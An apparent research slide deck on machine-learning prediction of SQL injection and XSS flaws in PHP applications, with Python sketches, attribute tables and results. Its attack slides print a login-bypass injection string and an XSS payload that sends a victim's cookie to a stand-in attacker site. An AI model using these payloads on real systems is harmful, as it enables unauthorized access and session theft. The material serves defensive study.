Problem Definition 1/2
• Input validation and sanitization are two common defense methods used in web applications.
• Static attributes have been shown to be indicators of vulnerabilities, though not accurate enough.
• Can we use static and dynamic attributes that characterize the implementations of these defense methods together as indicators?
• Use machine learning to predict vulnerabilities based on these attributes.
Problem Definition 2/2
• Typical prediction models are classification-based.
• Being supervised learning, their effectiveness depends on the availability of sufficient training data tagged with class labels.
• Cluster analysis (CA) is a type of unsupervised learning method.
• CA may be used if vulnerable instances can be distinguished from non-vulnerable instances based on the proposed attributes.
SQL Injection
• Attack flow: Hacker → login.php → Database
• login.php builds the query by concatenation: $q = "select * from user where name='".$name."' and pw='".$pw."'";
• Hacker input: $name = "' or 1=1 --"
• Resulting query: select * from user where name='' or 1=1 --' and pw=''
• Result: unauthorized user information is returned. SQLI!
• Cause: inadequate validation and sanitization of user inputs used in queries
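A minimal Python sketch of the attack above. It uses the standard-library sqlite3 module in place of the application's MySQL database, an assumption made so the example runs anywhere. The user table, its rows, and the function names are hypothetical. The second function shows a parameterized query, a standard countermeasure that is not part of the original slide.

```python
import sqlite3

def setup() -> sqlite3.Connection:
    # Hypothetical in-memory user table standing in for the login database.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (name text, pw text)")
    conn.executemany("insert into user values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_concat(conn, name, pw):
    # Vulnerable: mirrors the slide's string concatenation in login.php.
    q = "select * from user where name='" + name + "' and pw='" + pw + "'"
    return conn.execute(q).fetchall()

def login_param(conn, name, pw):
    # Placeholders keep user input as data, never as SQL syntax.
    q = "select * from user where name=? and pw=?"
    return conn.execute(q, (name, pw)).fetchall()

conn = setup()
attack = "' or 1=1 --"
print(login_concat(conn, attack, ""))  # every row leaks
print(login_param(conn, attack, ""))   # []
```

With concatenation, the injected quote closes the string literal, `or 1=1` makes the condition always true, and `--` comments out the password check. With placeholders, the same input is only an unusual user name and matches nothing.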
Cross-Site Scripting
• Cause: no sanity check of input before it is used in HTML documents
• Attack flow: Hacker → travelerTip.php → Victim
• Injected script (simple test): <script>alert('xss!');</script>
• Malicious request: http://travelingForum/travelerTip.php?Action=Post&Place=Greece&Tip=<script>document.location='http://hackerSite/stealCookie.jsp?cookie='+document.cookie;</script>
• The injected script is executed in the victim's browser and sends the victim's cookie to the hacker's site. XSS!
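The cause above can be sketched in Python with the standard-library `html.escape`. The two renderer functions are hypothetical stand-ins for travelerTip.php. Output encoding is shown as one common fix, not necessarily the one used by the applications in this deck.

```python
import html

def render_tip_unsafe(tip: str) -> str:
    # No sanity check: the input is pasted straight into the HTML document.
    return "<p>Tip: " + tip + "</p>"

def render_tip_escaped(tip: str) -> str:
    # html.escape turns &, <, > and (with quote=True) both quote characters
    # into HTML entities, so the browser displays the text instead of running it.
    return "<p>Tip: " + html.escape(tip, quote=True) + "</p>"

payload = ("<script>document.location='http://hackerSite/stealCookie.jsp"
           "?cookie='+document.cookie;</script>")

print(render_tip_unsafe(payload))
print(render_tip_escaped(payload))
```

In the escaped version, `<script>` becomes `&lt;script&gt;` and the single quotes become `&#x27;`, so no script element reaches the victim's browser.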
Vulnerability Prediction Principles 1/2
• Use hybrid code attributes, based on both static and dynamic program analyses, to predict vulnerabilities.
• Input validation checks and sanitization operations are mainly based on string operations, e.g., preg_replace("/<script/", "", $data)
• Classify the types of string operations applied to an input according to their potential effects on it before it is used in security-sensitive statements (sinks), e.g., echo $data; mysql_query($data)
• Such validation checks and operations can be identified by analyzing data dependence graphs.
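Classifying operations by their potential effect on inputs can be pictured as a lookup from PHP function names to categories. The mapping below is a hypothetical, partial example whose category names echo the attribute table later in this deck. It is not the authors' actual classification. Functions whose effect depends on their arguments (string replacement), and anything not known to be a built-in (e.g. user-defined functions), fall through to dynamic classification.

```python
# Hypothetical, partial mapping from PHP built-ins to operation categories.
STATIC_CATEGORIES = {
    "addslashes": "SQLI-sanitization",
    "mysql_real_escape_string": "SQLI-sanitization",
    "htmlspecialchars": "XSS-sanitization",
    "htmlentities": "XSS-sanitization",
    "intval": "Numeric-casting",
    "floatval": "Numeric-casting",
    "is_numeric": "Numeric-type-check",
    "ctype_digit": "Numeric-type-check",
    "urlencode": "Encoding",
    "base64_encode": "Encoding",
}

# Built-ins whose effect depends on their arguments, e.g. string replacement.
DYNAMIC_BUILTINS = {"preg_replace", "str_replace"}

# Security-sensitive statements (sinks) named on the slide.
SINKS = {"echo", "mysql_query"}

def classify_call(name: str) -> str:
    if name in SINKS:
        return "Sink"
    if name in STATIC_CATEGORIES:
        return STATIC_CATEGORIES[name]
    if name in DYNAMIC_BUILTINS:
        return "Dynamic (built-in)"
    # Unknown names are assumed to be user-defined and must be executed.
    return "Dynamic (user-defined or unknown)"

print(classify_call("addslashes"))    # SQLI-sanitization
print(classify_call("preg_replace"))  # Dynamic (built-in)
```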
Vulnerability Prediction Principles 2/2
• Given the data dependence graph of a sink, can we predict the sink's vulnerability by extracting from the graph the number of inputs and the numbers and types of validation and sanitization functions?
• E.g., if a sink uses five different inputs, there should be at least five input validation or sanitization functions.
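A minimal sketch of the extraction step, assuming the data dependence graph is a dictionary from each node to the nodes whose values it uses. The PHP statements, node labels, and the set of validation kinds are all hypothetical. A backward breadth-first search from the sink collects every node the sink depends on. The node kinds are then counted and the slide's rule of thumb is applied: fewer validation or sanitization nodes than inputs is suspicious. This rule is only a heuristic, not the prediction model itself.

```python
from collections import deque

# Hypothetical data dependence graph for one sink:
# each node maps to the nodes whose values it uses.
DEPENDS_ON = {
    "n5: echo $msg": ["n4: $msg = $a . $b"],
    "n4: $msg = $a . $b": ["n2: $a = htmlspecialchars($x)", "n3: $b = $_GET['b']"],
    "n2: $a = htmlspecialchars($x)": ["n1: $x = $_GET['a']"],
    "n1: $x = $_GET['a']": [],
    "n3: $b = $_GET['b']": [],
}

# Hypothetical node kinds, as a node classifier might assign them.
KIND = {
    "n1: $x = $_GET['a']": "Client",
    "n3: $b = $_GET['b']": "Client",
    "n2: $a = htmlspecialchars($x)": "XSS-sanitization",
    "n4: $msg = $a . $b": "Propagate",
    "n5: echo $msg": "Sink",
}

VALIDATION_KINDS = {"SQLI-sanitization", "XSS-sanitization",
                    "Numeric-casting", "Numeric-type-check", "Encoding"}

def backward_slice(sink):
    """All nodes the sink transitively depends on (breadth-first search)."""
    seen, queue = set(), deque([sink])
    while queue:
        for pred in DEPENDS_ON.get(queue.popleft(), []):
            if pred not in seen:
                seen.add(pred)
                queue.append(pred)
    return seen

def count_kinds(sink):
    counts = {}
    for node in backward_slice(sink):
        kind = KIND.get(node, "Other")
        counts[kind] = counts.get(kind, 0) + 1
    return counts

def looks_undersanitized(sink):
    counts = count_kinds(sink)
    inputs = counts.get("Client", 0)
    checks = sum(n for k, n in counts.items() if k in VALIDATION_KINDS)
    return checks < inputs

sink = "n5: echo $msg"
print(looks_undersanitized(sink))  # True: 2 inputs, 1 sanitizer
```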
Static and Dynamic Classification
• A node is classified statically from the language built-in functions that have specific security purposes, the language operators, and the predefined language parameters it uses, e.g., addslashes($input), $_GET, $a = $b . $c
• A node is classified dynamically if it invokes user-defined functions or certain built-in functions such as string replacement, e.g., $sanitized = preg_replace("/<+/", "", $input)
• The function code is executed on a set of predefined test inputs, and the final values of the test input variables are searched for malicious characters.
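A rough Python sketch of the dynamic step, assuming the sanitizer can be called as a Python function (the deck executes PHP code). The test inputs, the malicious-token lists, and the function names are hypothetical. A function counts as a filter for a category only if none of its outputs on that category's test inputs still contains a malicious token.

```python
import re
from typing import Callable

# Hypothetical predefined test inputs, grouped by the filter they probe.
TEST_INPUTS: dict[str, list[str]] = {
    "HTMLTag": ["<script>alert(1)</script>", "<<img src=x>"],
    "Delimiter": ["' or 1=1 --", '" or ""="'],
    "EventHandler": ["onmouseover=alert(1)"],
}

# Characters or tokens regarded as malicious per category (an assumption).
MALICIOUS: dict[str, list[str]] = {
    "HTMLTag": ["<"],
    "Delimiter": ["'", '"'],
    "EventHandler": ["onmouseover"],
}

def classify_dynamically(func: Callable[[str], str]) -> list[str]:
    """Run func on every test input and report the categories it filters."""
    filtered = []
    for category, inputs in TEST_INPUTS.items():
        outputs = [func(s) for s in inputs]
        # Search the final values for any remaining malicious token.
        if not any(tok in out for out in outputs for tok in MALICIOUS[category]):
            filtered.append(category)
    return filtered

# Python stand-in for the slide's $sanitized = preg_replace("/<+/", "", $input)
def strip_lt(s: str) -> str:
    return re.sub(r"<+", "", s)

print(classify_dynamically(strip_lt))  # ['HTMLTag']
```

Running the code on inputs, instead of reading it, is what lets a user-defined or argument-dependent function be placed into a category such as HTMLTag or Delimiter.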
Hybrid Code Attributes (ID, attribute name, description)
Static attributes
1 Client: the number of nodes that access data from HTTP request parameters
2 File: the number of nodes that access data from files
3 Database: the number of nodes that access data from a database
4 Text-database: Boolean, TRUE if any text-based data is accessed from the database; FALSE otherwise
5 Other-database: Boolean, TRUE if any data other than text-based data is accessed from the database; FALSE otherwise
6 Session: the number of nodes that access data from persistent data objects
7 Uninit: the number of nodes that reference uninitialized program variables
8 SQLI-sanitization: the number of nodes that apply standard sanitization functions for preventing SQLI issues
9 XSS-sanitization: the number of nodes that apply standard sanitization functions for preventing XSS issues
10 Numeric-casting: the number of nodes that type-cast data into a numeric type
11 Numeric-type-check: the number of nodes that perform a numeric data type check
12 Encoding: the number of nodes that encode data into a certain format
13 Un-taint: the number of nodes that return predefined information or information not influenced by external users
14 Boolean: the number of nodes that invoke functions returning a Boolean value
15 Propagate: the number of nodes that propagate a partial or complete value of an input
Dynamic attributes
16 Numeric: the number of nodes that invoke functions returning only numeric, mathematical, or dash characters
17 LimitLength: the number of nodes that invoke string-length-limiting functions
18 URL: the number of nodes that invoke path-filtering functions
19 EventHandler: the number of nodes that invoke event-handler filtering functions
20 HTMLTag: the number of nodes that invoke HTML-tag filtering functions
21 Delimiter: the number of nodes that invoke delimiter filtering functions
22 AlternateEncode: the number of nodes that invoke alternate-character-encoding filtering functions
Target attribute
23 Vulnerable?: indicates a class label, Vulnerable or Not-Vulnerable
Sample Attribute Vectors
• Each sink is represented by a 23-dimensional attribute vector.
• Sample attribute vectors (Session, XSS-sanit, Un-taint, Delimiter, Propagate, …, Vulnerable?):
(2, 4, 0, 0, 2, …, Not-Vulnerable)
(1, 0, 1, 1, 7, …, Vulnerable)
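A small sketch of turning per-sink counts into the 23-dimensional vector, using the attribute names and order from the table. Two details are assumptions: the Boolean attributes (Text-database, Other-database) are encoded as 1/0 so every feature is numeric, and attributes absent from the counts default to 0. The example counts are hypothetical, loosely based on the first sample vector with its elided entries set to 0.

```python
# The 22 predictor attributes in table order (IDs 1-22); ID 23 is the label.
ATTRIBUTES = [
    "Client", "File", "Database", "Text-database", "Other-database",
    "Session", "Uninit", "SQLI-sanitization", "XSS-sanitization",
    "Numeric-casting", "Numeric-type-check", "Encoding", "Un-taint",
    "Boolean", "Propagate",
    "Numeric", "LimitLength", "URL", "EventHandler", "HTMLTag",
    "Delimiter", "AlternateEncode",
]
BOOLEAN_ATTRIBUTES = {"Text-database", "Other-database"}

def to_vector(counts: dict, label: str) -> list:
    row = []
    for name in ATTRIBUTES:
        value = counts.get(name, 0)  # absent attributes count as 0 (assumed)
        # Booleans become 1/0 so the whole vector is numeric (assumed).
        row.append(int(bool(value)) if name in BOOLEAN_ATTRIBUTES else int(value))
    return row + [label]

v = to_vector({"Session": 2, "XSS-sanitization": 4, "Propagate": 2},
              "Not-Vulnerable")
print(len(v))  # 23
```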
Unsupervised Vulnerability Prediction
• Uses the same data preprocessing activities as the supervised models
• K-means cluster analysis, based on two assumptions:
  - non-vulnerable sinks are much more frequent than vulnerable sinks
  - vulnerable sinks have different characteristics from non-vulnerable sinks
• Clusters are labeled Vulnerable or Non-Vulnerable using two parameters:
  - K = 4: maximum number of clusters
  - %Normal = 12: minimum size of a non-vulnerable cluster
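A minimal k-means sketch in plain Python. Two details are assumptions, not taken from the deck. First, the labeling rule: clusters holding at least %Normal percent of all sinks are labeled Non-Vulnerable and smaller ones Vulnerable, which follows from the first assumption above. Second, K is treated as the exact number of clusters rather than a maximum. Seeding is farthest-first so the result is reproducible. The 2-D points are hypothetical stand-ins for attribute vectors.

```python
import math

def farthest_first(points, k):
    """Deterministic seeding: start at the first point, then repeatedly add
    the point farthest from all centroids chosen so far."""
    centroids = [points[0]]
    while len(centroids) < k:
        nxt = max(points, key=lambda p: min(math.dist(p, c) for c in centroids))
        centroids.append(nxt)
    return [list(c) for c in centroids]

def kmeans(points, k, max_iter=100):
    centroids = farthest_first(points, k)
    assign = None
    for _ in range(max_iter):
        # Assignment step: nearest centroid by Euclidean distance.
        new_assign = [min(range(k), key=lambda j: math.dist(p, centroids[j]))
                      for p in points]
        if new_assign == assign:
            break  # converged
        assign = new_assign
        # Update step: each centroid moves to the mean of its members.
        for j in range(k):
            members = [p for p, a in zip(points, assign) if a == j]
            if members:  # keep the old centroid if a cluster empties
                centroids[j] = [sum(col) / len(members) for col in zip(*members)]
    return assign

def label_clusters(points, k=4, pct_normal=12):
    assign = kmeans(points, k)
    sizes = {j: assign.count(j) for j in range(k)}
    threshold = len(points) * pct_normal / 100
    return ["Non-Vulnerable" if sizes[a] >= threshold else "Vulnerable"
            for a in assign]

# Hypothetical data: 25 "typical" sinks and 3 outliers.
normal = [(x, y) for x in range(5) for y in range(5)]
odd = [(10, 10), (10, 11), (11, 10)]
labels = label_clusters(normal + odd)
print(labels[-3:])  # the small outlying cluster is labeled Vulnerable
```

The sketch also shows why the method depends on its assumptions: if vulnerable sinks formed a large cluster, that cluster would pass the %Normal threshold and be labeled Non-Vulnerable.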
Case Study
• Six open-source PHP web applications, all with known vulnerabilities
• Functionalities: school administration, forum, news, content, and database management
• Sizes: from 2K to 44K LOC
• Vulnerability identification: manual inspection and vulnerability databases (Bugtraq, CVE)
Experiment & Result 1/2
• LR performs better than MLP.
• Maximum analysis time: 2 hours; average: ½ hour.
• Accuracy compared with related work:
  - Shin et al. (TSE'11) [3] achieved recall > 80 and pf < 25.
  - Pixy (S&P'06) [1] reported pf > 20: too many false positives!
  - Ardilla (ICSE'09) [4] reported up to 50% of paths left unexplored: false negatives?
  - Our result: recall = 90, pf = 5.

Classification results of predictors built from hybrid attributes (LR: logistic regression; MLP: multi-layer perceptron; pf: false alarm rate; all measures in %):

Data                    Classifier  Recall  False alarm  Precision
schmate-html            LR          99      3            98
                        MLP         99      0            100
faqforge-html           LR          89      5            94
                        MLP         91      5            94
utopia-html             LR          94      1            94
                        MLP         94      2            89
phorum-html             LR          78      1            70
                        MLP         33      0            100
cutesite-html           LR          68      9            61
                        MLP         78      8            67
myadmin-html            LR          85      1            89
                        MLP         75      1            83
Average (XSS)           LR          86      3            84
                        MLP         78      3            89
schmate-sql             LR          97      8            98
                        MLP         96      35           92
faqforge-sql            LR          88      4            94
                        MLP         88      4            94
phorum-sql              LR          100     3            63
                        MLP         0       1            0
cutesite-sql            LR          91      14           89
                        MLP         89      18           86
Average (SQLI)          LR          94      7            86
                        MLP         68      15           68
Overall average         LR          90      5            85
                        MLP         74      8            81
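The three measures in the table can be computed from a confusion matrix. The sketch below uses the standard definitions, assumed here to be the ones behind the reported figures. A measure whose denominator is zero is returned as None, which corresponds to the "undefined" entries in the clustering results. The counts in the example are hypothetical and chosen only for illustration.

```python
def prediction_measures(tp, fp, tn, fn):
    """Recall, false alarm rate (pf) and precision, in percent.
    A measure with a zero denominator is undefined and returned as None."""
    def pct(num, den):
        return None if den == 0 else 100.0 * num / den
    return {
        "recall": pct(tp, tp + fn),     # share of vulnerable sinks caught
        "pf": pct(fp, fp + tn),         # share of safe sinks wrongly flagged
        "precision": pct(tp, tp + fp),  # share of flagged sinks truly vulnerable
    }

# Hypothetical counts: 20 vulnerable sinks, 80 non-vulnerable sinks.
print(prediction_measures(tp=18, fp=4, tn=76, fn=2))
# If no sink is predicted vulnerable, precision is undefined (None).
print(prediction_measures(tp=0, fp=0, tn=40, fn=10))
```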
Experiment & Result 2/2
k-means clustering results on the datasets with < 40% vulnerable sinks (measures in %):

Data            Recall  False alarm  Precision
utopia-html     100     13           65
phorum-html     56      11           16
cutesite-html   70      20           41
myadmin-html    55      8            33
phorum-sql      100     7            38
Average         76      12           39

k-means clustering results on the datasets with ≥ 40% vulnerable sinks (measures in %):

Data            Recall  False alarm  Precision
schmate-html    9       0            100
faqforge-html   26      0            100
schmate-sql     3       32           29
faqforge-sql    0       0            undefined
cutesite-sql    0       0            undefined
Average         8       6            undefined

Precision is undefined when no sink is predicted vulnerable.
When the assumptions are not met, clustering does not work!
Limitations
• Supervised learning requires sufficient labeled data for training.
• Unsupervised learning relies on assumptions that do not always hold. Do they apply to most commercial systems?
• Unsupervised learning requires parameter tuning:
  - K: maximum number of clusters
  - %Normal: minimum size of a non-vulnerable cluster
Conclusion
• Supports security auditing by providing probabilistic alerts about vulnerable code statements
• Proposes hybrid (static and dynamic) code attributes for vulnerability prediction using machine learning
• The attributes characterize common input validation and sanitization code patterns without expensive analysis.
• Scalability: < 2 hours on a regular PC
• Both supervised and unsupervised learning methods were used:
  - Supervised learning accuracy: 90% recall, 85% precision
  - Unsupervised learning: lower accuracy; applicability?
Future Work
• Semi-supervised learning
• Combine data dependency information with control dependency information
• Address other types of similar vulnerabilities by considering other types of code patterns
The End! Thank you! Questions?
http://sharlwinkhin.com
References
1. N. Jovanovic, C. Kruegel, and E. Kirda, “Pixy: a static analysis tool for detecting web application vulnerabilities,” in IEEE Symposium on Security and Privacy, 2006, pp. 258-263.
2. D. Balzarotti et al., “Saner: composing static and dynamic analysis to validate sanitization in web applications,” in IEEE Symposium on Security and Privacy, 2008, pp. 387-401.
3. Y. Shin, A. Meneely, L. Williams, and J. A. Osborne, “Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities,” IEEE Transactions on Software Engineering, vol. 37, no. 6, pp. 772-787, 2011.
4. A. Kieżun, P. J. Guo, K. Jayaraman, and M. D. Ernst, “Automatic creation of SQL injection and cross-site scripting attacks,” in Proceedings of the 31st International Conference on Software Engineering, Vancouver, BC, 2009, pp. 199-209.
5. RSnake, http://ha.ckers.org, accessed March 2012.
6. I. H. Witten and E. Frank, Data Mining, 2nd ed., Morgan Kaufmann, 2005.